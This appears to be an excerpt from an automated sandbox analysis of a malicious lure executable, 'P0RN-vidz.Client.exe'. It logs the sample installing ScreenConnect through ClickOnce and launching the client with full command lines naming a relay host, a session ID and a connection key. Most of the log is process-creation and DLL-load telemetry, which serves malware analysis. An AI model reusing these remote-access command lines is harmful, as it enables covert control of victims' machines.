                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal48.evad.winEXE@18/82@5/3
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCommand line argument: dfshim0_2_00371000
                  Source: P0RN-vidz.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\P0RN-vidz.Client.exe "C:\Users\user\Desktop\P0RN-vidz.Client.exe"
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User"
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User"
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
